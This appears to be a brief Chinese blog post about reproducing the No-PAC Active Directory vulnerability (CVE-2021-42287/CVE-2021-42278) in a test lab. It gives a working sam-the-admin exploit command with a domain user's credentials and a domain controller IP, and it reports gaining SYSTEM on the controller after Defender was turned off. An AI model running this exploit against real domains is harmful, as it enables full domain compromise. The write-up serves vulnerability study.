No-PAC(CVE-2021-42287/CVE-2021-42278)漏洞复现

简单测试一下,刚换系统,环境都没有了,只有之前测的一部分


前置条件:需要一个域用户

kali环境下使用 sam-the-admin 项目进行攻击,只需一条命令
项目地址:https://github.com/WazeHell/sam-the-admin

获取权限Exp

1
python3 sam_the_admin.py "king/windows03w:edcRFV222" -dc-ip 192.168.204.146 -shell

执行发现报错

Assassins小白

网上找解决方法,作者说应该是杀软拦截

Assassins小白

那我们关闭域控上面的defender尝试一下

Assassins小白

关闭defender果然就成功获取到域控的system权限了

Assassins小白